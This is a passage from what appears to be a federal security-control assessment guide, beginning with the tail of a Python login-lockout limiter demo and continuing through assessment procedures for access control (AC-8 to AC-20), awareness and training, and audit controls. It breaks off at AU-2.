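            return "locked"
        if pol.response == "admin_release":
            st.locked_until = math.inf   # AC-7(1): held until release() is called
            return "locked"
        if pol.response == "delay":
            st.next_prompt_at = now + pol.delay_algorithm(excess)
            return "delayed"
        raise ValueError(f"unknown response selection: {pol.response}")

    def release(self, user: str) -> None:
        """Administrator action that clears a lock and any pending delay for the user."""
        self.accounts[user] = AccountState()


class FakeClock:
    """Deterministic clock for the walkthrough below (not for production use)."""

    def __init__(self, start: float = 0.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


def demo() -> List[str]:
    """Temporary-lock selection with constructed values: 3 attempts per 15 minutes, 30-minute lock."""
    clock = FakeClock()
    limiter = LoginLimiter(Policy(max_attempts=3, window_seconds=900, response="lock", lock_seconds=1800), clock)
    results = [limiter.attempt("alice", False) for _ in range(4)]   # failure x3, then locked
    results.append(limiter.attempt("alice", True))                   # correct password, still locked
    clock.advance(1800)
    results.append(limiter.attempt("alice", True))                   # lock released automatically
    return results


if __name__ == "__main__":
    print(demo())
```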


ASSESSMENT PROCEDURE
AC-8 SYSTEM USE NOTIFICATION
Control: The information system displays an approved, system use notification message before granting system access informing potential users: (i) that the user is accessing a U.S. Government information system; (ii) that system usage may be monitored, recorded, and subject to audit; (iii) that unauthorized use of the system is prohibited and subject to criminal and civil penalties; and (iv) that use of the system indicates consent to monitoring and recording. The system use notification message provides appropriate privacy and security notices (based on associated privacy and security policies or summaries) and remains on the screen until the user takes explicit actions to log on to the information system.
Supplemental Guidance: Privacy and security policies are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. System use notification messages can be implemented in the form of warning banners displayed when individuals log in to the information system. For publicly accessible systems: (i) the system use information is available and when appropriate, is displayed before granting access; (ii) any references to monitoring, recording, or auditing are in keeping with privacy accommodations for such systems that generally prohibit those activities; and (iii) the notice given to public users of the information system includes a description of the authorized uses of the system.
AC-8.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the information system displays a system use notification message before granting system access informing potential users:
  • that the user is accessing a U.S. Government information system;
  • that system usage may be monitored, recorded, and subject to audit;
  • that unauthorized use of the system is prohibited and subject to criminal and civil penalties; and
  • that use of the system indicates consent to monitoring and recording;
(ii) the system use notification message provides appropriate privacy and security notices (based on associated privacy and security policies or summaries);
(iii) the organization approves the information system use notification message before its use; and
(iv) the system use notification message remains on the screen until the user takes explicit actions to log on to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; privacy and security policies; procedures addressing system use notification; information system notification messages; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for system use notification]. (H)


ASSESSMENT PROCEDURE
AC-9 PREVIOUS LOGON NOTIFICATION
Control: The information system notifies the user, upon successful logon, of the date and time of the last logon, and the number of unsuccessful logon attempts since the last successful logon.
Supplemental Guidance: None.
AC-9.1 ASSESSMENT OBJECTIVE:
Determine if the information system, upon successful logon, displays the date and time of the last logon and the number of unsuccessful logon attempts since the last successful logon.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing previous logon notification; information system configuration settings and associated documentation; information system notification messages; information system design documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for previous logon notification].


ASSESSMENT PROCEDURE
AC-10 CONCURRENT SESSION CONTROL
Control: The information system limits the number of concurrent sessions for any user to [Assignment: organization-defined number of sessions].
Supplemental Guidance: None.
AC-10.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the maximum number of concurrent sessions for information system users; and
(ii) the information system limits the number of concurrent sessions for users to the organization-defined number of sessions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing concurrent session control; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for concurrent session control]. (H)


ASSESSMENT PROCEDURE
AC-11 SESSION LOCK
Control: The information system prevents further access to the system by initiating a session lock after [Assignment: organization-defined time period] of inactivity, and the session lock remains in effect until the user reestablishes access using appropriate identification and authentication procedures.
Supplemental Guidance: Users can directly initiate session lock mechanisms. A session lock is not a substitute for logging out of the information system. Organization-defined time periods of inactivity comply with federal policy; for example, in accordance with OMB Memorandum 06-16, the organization-defined time period is no greater than thirty minutes for remote access and portable devices.
AC-11.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the time period of user inactivity after which the information system initiates a session lock;
(ii) the information system initiates a session lock after the organization-defined time period of inactivity;
(iii) the information system provides the capability for users to directly initiate session lock mechanisms; and
(iv) the information system maintains the session lock until the user reestablishes access using appropriate identification and authentication procedures.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing session lock; information system design documentation; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for session lock]. (H)


ASSESSMENT PROCEDURE
AC-12 SESSION TERMINATION
Control: The information system automatically terminates a remote session after [Assignment: organization-defined time period] of inactivity.
Supplemental Guidance: A remote session is initiated whenever an organizational information system is accessed by a user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet).
AC-12.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the time period of user inactivity that initiates a remote session termination within the information system; and
(ii) the information system automatically terminates a remote session after the organization-defined time period of inactivity.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing session termination; information system design documentation; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for session termination]. (H)
AC-12(1) SESSION TERMINATION
Control Enhancement:
Automatic session termination applies to local and remote sessions.
AC-12(1).1 ASSESSMENT OBJECTIVE:
Determine if automatic session termination applies to local and remote sessions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing session termination; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for session termination]. (H)


ASSESSMENT PROCEDURE
AC-13 SUPERVISION AND REVIEW — ACCESS CONTROL
Control: The organization supervises and reviews the activities of users with respect to the enforcement and usage of information system access controls.
Supplemental Guidance: The organization reviews audit records (e.g., user activity logs) for inappropriate activities in accordance with organizational procedures. The organization investigates any unusual information system-related activities and periodically reviews changes to access authorizations. The organization reviews more frequently the activities of users with significant information system roles and responsibilities. The extent of the audit record reviews is based on the FIPS 199 impact level of the information system. For example, for low-impact systems, it is not intended that security logs be reviewed frequently for every workstation, but rather at central points such as a web proxy or email servers and when specific circumstances warrant review of other audit records. NIST Special Publication 800-92 provides guidance on computer security log management.
AC-13.1 ASSESSMENT OBJECTIVE:
Determine if the organization supervises and reviews the activities of users with respect to the enforcement and usage of information system access controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing supervision and review of access control enforcement and usage; organizational records of supervisory notices of disciplinary actions to users; information system exception reports; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with supervisory and access control responsibilities]. (M) (H)
AC-13(1) SUPERVISION AND REVIEW — ACCESS CONTROL
Control Enhancement:
The organization employs automated mechanisms to facilitate the review of user activities.
AC-13(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms within the information system to support and facilitate the review of user activities.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing supervision and review of access control enforcement and usage; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms supporting the access control policy for supervision and review of user activities]. (H)


ASSESSMENT PROCEDURE
AC-14 PERMITTED ACTIONS WITHOUT IDENTIFICATION OR AUTHENTICATION
Control: The organization identifies and documents specific user actions that can be performed on the information system without identification or authentication.
Supplemental Guidance: The organization allows limited user activity without identification and authentication for public websites or other publicly available information systems (e.g., individuals accessing a federal information system at http://www.firstgov.gov). Related security control: IA-2.
AC-14.1 ASSESSMENT OBJECTIVE:
Determine if the organization identifies and documents specific user actions that can be performed on the information system without identification or authentication.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing permitted actions without identification and authentication; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (L) (M) (H)
AC-14(1) PERMITTED ACTIONS WITHOUT IDENTIFICATION OR AUTHENTICATION
Control Enhancement:
The organization permits actions to be performed without identification and authentication only to the extent necessary to accomplish mission objectives.
AC-14(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization permits actions to be performed without identification and authentication only to the extent necessary to accomplish mission objectives.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing permitted actions without identification and authentication; information system configuration settings and associated documentation; list of organization-defined actions that can be performed without identification and authentication; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for defining permitted actions without identification and authentication]. (H)


ASSESSMENT PROCEDURE
AC-15 AUTOMATED MARKING
Control: The information system marks output using standard naming conventions to identify any special dissemination, handling, or distribution instructions.
Supplemental Guidance: Automated marking refers to markings employed on external media (e.g., hardcopy documents output from the information system). The markings used in external marking are distinguished from the labels used on internal data structures described in AC-16.
AC-15.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies standard naming conventions for identification of special dissemination, handling, or distribution instructions; and
(ii) the information system marks output using standard naming conventions to identify any special dissemination, handling, or distribution instructions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures for addressing automated marking of information system output; information system output; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for defining special dissemination, handling, and marking instructions for information system output]. (H)
Test: [SELECT FROM: Automated mechanisms implementing automated marking of information system output]. (H)


ASSESSMENT PROCEDURE
AC-16 AUTOMATED LABELING
Control: The information system appropriately labels information in storage, in process, and in transmission.
Supplemental Guidance: Automated labeling refers to labels employed on internal data structures (e.g., records, files) within the information system. Information labeling is accomplished in accordance with: (i) access control requirements; (ii) special dissemination, handling, or distribution instructions; or (iii) as otherwise required to enforce information system security policy.
AC-16.1 ASSESSMENT OBJECTIVE:
Determine if the information system appropriately labels information in storage, in process, and in transmission.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing automated (internal) labeling of information within the information system; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing automated (internal) labeling within the information system].


ASSESSMENT PROCEDURE
AC-17 REMOTE ACCESS
Control: The organization authorizes, monitors, and controls all methods of remote access to the information system.
Supplemental Guidance: Remote access is any access to an organizational information system by a user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet). Examples of remote access methods include dial-up, broadband, and wireless. Remote access controls are applicable to information systems other than public web servers or systems specifically designed for public access. The organization restricts access achieved through dial-up connections (e.g., limiting dial-up access based upon source of request) or protects against unauthorized connections or subversion of authorized connections (e.g., using virtual private network technology). NIST Special Publication 800-63 provides guidance on remote electronic authentication. If the federal Personal Identity Verification (PIV) credential is used as an identification token where cryptographic token-based access control is employed, the access control system conforms to the requirements of FIPS 201 and NIST Special Publications 800-73 and 800-78. NIST Special Publication 800-77 provides guidance on IPsec-based virtual private networks. Related security control: IA-2.
AC-17.1 ASSESSMENT OBJECTIVE:
Determine if the organization authorizes, monitors, and controls remote access to the information system for all allowed methods of remote access to include both establishment of the remote connection and subsequent user actions across that connection.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with remote access authorization, monitoring, and control responsibilities]. (M) (H)
Test: [SELECT FROM: Remote access methods for the information system]. (H)
AC-17(1) REMOTE ACCESS
Control Enhancement:
The organization employs automated mechanisms to facilitate the monitoring and control of remote access methods.
AC-17(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system employs automated mechanisms to facilitate the monitoring and control of remote access methods.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for remote access]. (H)
AC-17(2) REMOTE ACCESS
Control Enhancement:
The organization uses cryptography to protect the confidentiality and integrity of remote access sessions.
AC-17(2).1 ASSESSMENT OBJECTIVE:
Determine if the information system employs cryptography to protect the confidentiality and integrity of remote access sessions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing cryptographic protections for remote access]. (H)
AC-17(3) REMOTE ACCESS
Control Enhancement:
The organization controls all remote accesses through a limited number of managed access control points.
AC-17(3).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines managed access control points for remote access to the information system; and
(ii) the information system controls all remote accesses through a limited number of managed access control points.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system design documentation; list of managed access control points; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for remote access]. (H)
AC-17(4) REMOTE ACCESS
Control Enhancement:
The organization permits remote access for privileged functions only for compelling operational needs and documents the rationale for such access in the security plan for the information system.
AC-17(4).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the situations and compelling operational needs when remote access to privileged functions on the information system is allowed; and
(ii) the organization permits remote access for privileged functions only for compelling operational needs and documents the rationale for such access in the security plan for the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing remote access to the information system; information system configuration settings and associated documentation; security plan; information system audit records; other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
AC-18 WIRELESS ACCESS RESTRICTIONS
Control: The organization: (i) establishes usage restrictions and implementation guidance for wireless technologies; and (ii) authorizes, monitors, and controls wireless access to the information system.
Supplemental Guidance: NIST Special Publications 800-48 and 800-97 provide guidance on wireless network security. NIST Special Publication 800-94 provides guidance on wireless intrusion detection and prevention.
AC-18.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes usage restrictions and implementation guidance for wireless technologies;
(ii) the organization authorizes, monitors, and controls wireless access to the information system; and
(iii) the wireless access restrictions are consistent with NIST Special Publications 800-48 and 800-97.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing wireless implementation and usage (including restrictions); NIST Special Publications 800-48 and 800-97; activities related to wireless authorization, monitoring, and control; information system audit records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel responsible for authorizing, monitoring, or controlling the use of wireless technologies in the information system]. (M) (H)
Test: [SELECT FROM: Wireless access usage and restrictions]. (M) (H)
AC-18(1) WIRELESS ACCESS RESTRICTIONS
Control Enhancement:
The organization uses authentication and encryption to protect wireless access to the information system.
AC-18(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization uses authentication and encryption to protect wireless access to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing wireless implementation and usage (including restrictions); information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for wireless access to the information system]. (H)
AC-18(2) WIRELESS ACCESS RESTRICTIONS
Control Enhancement:
The organization scans for unauthorized wireless access points [Assignment: organization-defined frequency] and takes appropriate action if such access points are discovered.
Enhancement Supplemental Guidance: Organizations conduct a thorough scan for unauthorized wireless access points in facilities containing high-impact information systems. The scan is not limited to only those areas within the facility containing the high-impact information systems.
AC-18(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of scans for unauthorized wireless access points; and
(ii) the organization scans for unauthorized wireless access points in accordance with the organization-defined frequency and takes appropriate action if such access points are discovered.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing wireless implementation and usage (including restrictions); wireless scanning reports; other relevant documents or records]. (H)
Test: [SELECT FROM: Scanning procedure for unauthorized wireless access points]. (H)


ASSESSMENT PROCEDURE
AC-19 ACCESS CONTROL FOR PORTABLE AND MOBILE DEVICES
Control: The organization: (i) establishes usage restrictions and implementation guidance for organization-controlled portable and mobile devices; and (ii) authorizes, monitors, and controls device access to organizational information systems.
Supplemental Guidance: Portable and mobile devices (e.g., notebook computers, personal digital assistants, cellular telephones, and other computing and communications devices with network connectivity and the capability of periodically operating in different physical locations) are only allowed access to organizational information systems in accordance with organizational security policies and procedures. Security policies and procedures include device identification and authentication, implementation of mandatory protective software (e.g., malicious code detection, firewall), configuration management, scanning devices for malicious code, updating virus protection software, scanning for critical software updates and patches, conducting primary operating system (and possibly other resident software) integrity checks, and disabling unnecessary hardware (e.g., wireless, infrared). Protecting information residing on portable and mobile devices (e.g., employing cryptographic mechanisms to provide confidentiality and integrity protections during storage and while in transit when outside of controlled areas) is covered in the media protection family. Related security controls: MP-4, MP-5.
AC-19.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes usage restrictions and implementation guidance for organization-controlled portable and mobile devices; and
(ii) the organization authorizes, monitors, and controls device access to organizational information systems.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing access control for portable and mobile devices; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel who use portable and mobile devices to access the information system]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access control policy for portable and mobile devices]. (H)


ASSESSMENT PROCEDURE
AC-20 USE OF EXTERNAL INFORMATION SYSTEMS
Control: The organization establishes terms and conditions for authorized individuals to: (i) access the information system from an external information system; and (ii) process, store, and/or transmit organization-controlled information using an external information system.
Supplemental Guidance: External information systems are information systems or components of information systems that are outside of the accreditation boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. External information systems include, but are not limited to, personally owned information systems (e.g., computers, cellular telephones, or personal digital assistants); privately owned computing and communications devices resident in commercial or public facilities (e.g., hotels, convention centers, or airports); information systems owned or controlled by nonfederal governmental organizations; and federal information systems that are not owned by, operated by, or under the direct control of the organization.
Authorized individuals include organizational personnel, contractors, or any other individuals with authorized access to the organizational information system. This control does not apply to the use of external information systems to access organizational information systems and information that are intended for public access (e.g., individuals accessing federal information through public interfaces to organizational information systems). The organization establishes terms and conditions for the use of external information systems in accordance with organizational security policies and procedures. The terms and conditions address, as a minimum: (i) the types of applications that can be accessed on the organizational information system from the external information system; and (ii) the maximum FIPS 199 security category of information that can be processed, stored, and transmitted on the external information system.
AC-20.1 ASSESSMENT OBJECTIVE:
Determine if the organization establishes terms and conditions for authorized individuals to access the information system from an external information system that include the types of applications that can be accessed on the organizational information system from the external information system and the maximum FIPS 199 security category of information that can be processed, stored, and transmitted on the external information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing the use of external information systems; external information systems terms and conditions; list of types of applications accessible from external information systems; maximum FIPS 199 impact level for information processed, stored, or transmitted on external information systems; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for defining terms and conditions for use of external information systems to access organizational systems]. (M) (H)
AC-20(1) USE OF EXTERNAL INFORMATION SYSTEMS
Control Enhancement:
The organization prohibits authorized individuals from using an external information system to access the information system or to process, store, or transmit organization-controlled information except in situations where the organization: (i) can verify the employment of required security controls on the external system as specified in the organization's information security policy and system security plan; or (ii) has approved information system connection or processing agreements with the organizational entity hosting the external information system.
AC-20(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization prohibits authorized individuals from using an external information system to access the information system or to process, store, or transmit organization-controlled information except in situations where the organization:
  • verifies, for authorized exceptions, the employment of required security controls on the external system as specified in the organization's information security policy and system security plan when allowing connections to the external information system; or
  • approves, for authorized exceptions, information system connection or processing agreements with the organizational entity hosting the external information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing the use of external information systems; security plan; information system configuration settings and associated documentation; information system connection or processing agreements; account management documents; other relevant documents or records]. (M) (H)


FAMILY:

Awareness and Training


ASSESSMENT PROCEDURE
AT-1 SECURITY AWARENESS AND TRAINING POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, security awareness and training policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the security awareness and training policy and associated security awareness and training controls.
Supplemental Guidance: The security awareness and training policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The security awareness and training policy can be included as part of the general information security policy for the organization. Security awareness and training procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publications 800-16 and 800-50 provide guidance on security awareness and training. NIST Special Publication 800-12 provides guidance on security policies and procedures.
AT-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents security awareness and training policy and procedures;
(ii) the organization disseminates security awareness and training policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review security awareness and training policy and procedures; and
(iv) the organization updates security awareness and training policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security awareness and training policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security awareness and training responsibilities]. (H)
AT-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the security awareness and training policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the security awareness and training policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the security awareness and training procedures address all areas identified in the security awareness and training policy and address achieving policy-compliant implementations of all associated security awareness and training controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security awareness and training policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security awareness and training responsibilities]. (H)


ASSESSMENT PROCEDURE
AT-2 SECURITY AWARENESS
Control: The organization provides basic security awareness training to all information system users (including managers and senior executives) before authorizing access to the system, when required by system changes, and [Assignment: organization-defined frequency, at least annually] thereafter.
Supplemental Guidance: The organization determines the appropriate content of security awareness training based on the specific requirements of the organization and the information systems to which personnel have authorized access. The organization's security awareness program is consistent with the requirements contained in 5 C.F.R. Part 930, Subpart C (5 C.F.R. 930.301) and with the guidance in NIST Special Publication 800-50.
AT-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization provides basic security awareness training to all information system users (including managers and senior executives) before authorizing access to the system and when required by system changes;
(ii) the security awareness training is consistent with applicable regulations and NIST Special Publication 800-50;
(iii) the security awareness and training materials address the specific requirements of the organization and the information systems to which personnel have authorized access;
(iv) the organization defines in the security plan, explicitly or by reference, the frequency of refresher security awareness training and the frequency is at least annually; and
(v) the organization provides refresher security awareness training in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security awareness and training policy; procedures addressing security awareness training implementation; NIST Special Publication 800-50; appropriate codes of federal regulations; security awareness training curriculum; security awareness training materials; security plan; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel comprising the general information system user community]. (H)


ASSESSMENT PROCEDURE
AT-3 SECURITY TRAINING
Control: The organization identifies personnel that have significant information system security roles and responsibilities during the system development life cycle, documents those roles and responsibilities, and provides appropriate information system security training: (i) before authorizing access to the system or performing assigned duties; (ii) when required by system changes; and (iii) [Assignment: organization-defined frequency] thereafter.
Supplemental Guidance: The organization determines the appropriate content of security training based on the specific requirements of the organization and the information systems to which personnel have authorized access. In addition, the organization provides system managers, system and network administrators, and other personnel having access to system-level software, adequate technical training to perform their assigned duties. The organization's security training program is consistent with the requirements contained in 5 C.F.R. Part 930, Subpart C (5 C.F.R. 930.301) and with the guidance in NIST Special Publication 800-50.
AT-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies personnel with significant information system security responsibilities and roles and documents those roles and responsibilities;
(ii) the organization provides security training to personnel with identified information system security roles and responsibilities before authorizing access to the system or performing assigned duties and when required by system changes;
(iii) the security training materials address the procedures and activities necessary to fulfill the organization-defined roles and responsibilities for information system security;
(iv) the security training is consistent with applicable regulations and NIST Special Publication 800-50;
(v) the organization defines in the security plan, explicitly or by reference, the frequency of refresher security training; and
(vi) the organization provides refresher security training in accordance with organization-defined frequency, at least annually.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security awareness and training policy; procedures addressing security training implementation; NIST Special Publication 800-50; codes of federal regulations; security training curriculum; security training materials; security plan; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with significant information system security responsibilities]. (H)


ASSESSMENT PROCEDURE
AT-4 SECURITY TRAINING RECORDS
Control: The organization documents and monitors individual information system security training activities including basic security awareness training and specific information system security training.
Supplemental Guidance: None.
AT-4.1 ASSESSMENT OBJECTIVE:
Determine if the organization monitors and documents basic security awareness training and specific information system security training.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security awareness and training policy; procedures addressing security training records; security awareness and training records; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
AT-5 CONTACTS WITH SECURITY GROUPS AND ASSOCIATIONS
Control: The organization establishes and maintains contacts with special interest groups, specialized forums, professional associations, news groups, and/or peer groups of security professionals in similar organizations to stay up to date with the latest recommended security practices, techniques, and technologies and to share the latest security-related information including threats, vulnerabilities, and incidents.
Supplemental Guidance: To facilitate ongoing security education and training for organizational personnel in an environment of rapid technology changes and dynamic threats, the organization establishes and institutionalizes contacts with selected groups and associations within the security community. The groups and associations selected are in keeping with the organization's mission requirements. Information sharing activities regarding threats, vulnerabilities, and incidents related to information systems are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance.
AT-5.1 ASSESSMENT OBJECTIVE:
Determine if the organization establishes and maintains contact with special interest groups, specialized forums, or professional associations to keep current with state-of-the-practice security techniques and technologies and to share security-related information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security awareness and training policy; procedures addressing contacts with security groups and associations; list of organization-defined key contacts to obtain ongoing information system security knowledge, expertise, and general information; other relevant documents or records].


FAMILY:

Audit and Accountability


ASSESSMENT PROCEDURE
AU-1 AUDIT AND ACCOUNTABILITY POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, audit and accountability policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the audit and accountability policy and associated audit and accountability controls.
Supplemental Guidance: The audit and accountability policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The audit and accountability policy can be included as part of the general information security policy for the organization. Audit and accountability procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
AU-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents audit and accountability policy and procedures;
(ii) the organization disseminates audit and accountability policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review audit and accountability policy and procedures; and
(iv) the organization updates audit and accountability policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with audit and accountability responsibilities]. (H)
AU-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the audit and accountability policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the audit and accountability policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the audit and accountability procedures address all areas identified in the audit and accountability policy and address achieving policy-compliant implementations of all associated audit and accountability controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with audit and accountability responsibilities]. (H)


ASSESSMENT PROCEDURE
AU-2 AUDITABLE EVENTS
Control: The information system generates audit records for the following events: [Assignment: organization-defined auditable events].
